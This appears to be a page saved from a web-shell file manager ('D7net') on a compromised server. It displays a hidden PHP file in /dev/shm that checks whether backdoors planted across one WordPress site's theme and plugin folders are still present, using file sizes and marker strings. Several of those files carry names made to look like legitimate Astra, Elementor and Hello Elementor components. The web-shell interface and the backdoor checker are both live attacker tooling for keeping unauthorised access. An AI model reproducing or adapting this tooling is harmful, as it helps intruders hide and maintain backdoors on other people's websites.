D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.element
back
Copy
<?php $r = '/home/archyapa/jayne.niddo.io'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@230990@@reverse_lookup", "/wp-content/themes/hello-elementor/includes/customizer-functions.php"=>"bd@@216596@@module_controller", "/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/dist/template-preview/polish.lng.php"=>"bd@@216600@@645", "/wp-content/plugins/astra-sites/inc/classes/compatibility/uabb/class.astra.sites.compatibility.uabb.php"=>"bd@@216611@@1650", "/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/woo-cart.php"=>"bd@@231017@@sync_manager", "/wp-content/themes/hello-elementor/template-parts/footer.php"=>"bd@@231037@@service_registry", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/personal_mess.php"=>"bd@@231041@@2250", "/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/dist/onboarding/edit.menu.php"=>"bd@@231045@@1885", "/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class.astra.edd.sidebar.configs.php"=>"bd@@231057@@2162", "/wp-content/plugins/astra-sites/inc/lib/starter-templates-importer/resetter/st.resetter.php"=>"bd@@231061@@1779", "/wp-content/plugins/elementor/modules/atomic-widgets/database/migrations/add.capabilities.php"=>"bd@@231064@@1616", "/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/compatibility/surerank/ai.builder.compatibility.surerank.php"=>"bd@@229791@@1714", "/wp-content/plugins/astra-sites/inc/lib/gutenberg-templates/inc/block/spectra.ai.block.php"=>"bd@@229804@@1707", "/wp-content/plugins/astra-sites/inc/lib/zip-ai/sidebar/build/sidebar.app.asset.php"=>"bd@@229807@@1527", "/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-edd-cart-configs.php"=>"bd@@221878@@splitter_tool", "/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/query.php"=>"bd@@221921@@2762"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');